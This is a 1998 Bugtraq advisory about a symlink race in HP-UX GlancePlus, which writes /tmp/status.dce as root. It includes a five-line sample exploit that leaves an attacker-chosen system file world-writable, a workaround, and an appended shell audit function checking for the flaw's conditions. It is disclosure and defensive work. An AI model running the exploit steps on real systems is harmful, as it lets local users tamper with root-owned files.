Date: Mon, 27 Apr 1998 23:31:12 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: HP-UX glance bug (#4?)

* Software:

    HP-UX B.10.20 D
    Glance.Runtime.GLANCE B.10.20.95 HP GlancePlus files

* Bug:

    glance creates a /tmp/status.dce file as root, and it follows
    symlinks, so you can append text like

    Pid: 16208 File: ndi_sm.c Line: 2609 Mon Apr 27 21:52:23 1998
    Performance Management Application registered.
    --------------------------------------------------------------------------

    to any system file.

* Sample exploit:

    $ umask 000
    $ cd /tmp
    $ ln -s /.test status.dce
    $ glance -j 1 -iterations 1 -maxpages 1
    $ ls -l /.test
    -rw-rw-rw- 1 root bar 1080 Apr 27 23:06 /.test
    # edit /.test to match your needs

* Workaround:

    I guess creating a non-writable /tmp/status.dce file
    and setting the t bit on /tmp (which it seems it has not in
    the default HPUX installation) would be enough

* Note:

    I've been looking for HP-UX bugs, and I have found several
    reported holes in glance; but it seems this one is new...

--
J.A. Gutierrez
So be easy and free
when you're drinking with me
I'm a man you don't meet every day
finger me for PGP
(the pogues)
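
The workaround suggested in the message above, turned into an audit check. This is an added example, not part of the original post or of any HP tooling; the function name check_status_file and the expected-owner argument are assumptions. It reports a directory without the sticky bit, a symlink planted under the file name, and a status file that is missing, writable by group or other, or owned by an unexpected uid.

```shell
#!/bin/sh
# Added example (not from the advisory): audit the workaround conditions.
# Usage: check_status_file DIR [NAME] [OWNER_UID]
# Prints one FINDING line per problem; returns 0 when clean, 1 otherwise.
check_status_file() {
    dir=$1
    name=${2:-status.dce}      # file name taken from the advisory
    want_uid=${3:-0}           # assumption: the file should belong to root
    path=$dir/$name
    rc=0

    # The sticky bit shows as 't' or 'T' in the 10th column of the mode string.
    dmode=$(ls -ldn "$dir" | cut -c1-10)
    case $dmode in
        *[tT]) ;;
        *) echo "FINDING: $dir lacks the sticky bit ($dmode)"; rc=1 ;;
    esac

    if [ -L "$path" ]; then
        # A symlink under this name is what a root-run writer would follow.
        target=$(ls -ln "$path" | sed 's/.* -> //')
        echo "FINDING: $path is a symlink to $target"; rc=1
    elif [ -f "$path" ]; then
        fmode=$(ls -ln "$path" | cut -c1-10)
        fuid=$(ls -ln "$path" | awk '{print $3}')
        case $fmode in
            ?????-??-?) ;;     # neither group nor other write bit is set
            *) echo "FINDING: $path is group/other writable ($fmode)"; rc=1 ;;
        esac
        if [ "$fuid" != "$want_uid" ]; then
            echo "FINDING: $path owned by uid $fuid, expected $want_uid"; rc=1
        fi
    else
        # Absent or not a regular file: any local user can still plant the name.
        echo "FINDING: $path is not a pre-created regular file"; rc=1
    fi
    return $rc
}
```

On a live system the call would be `check_status_file /tmp`; the sticky bit alone does not stop another user from creating the name first, which is why an absent file is reported as well.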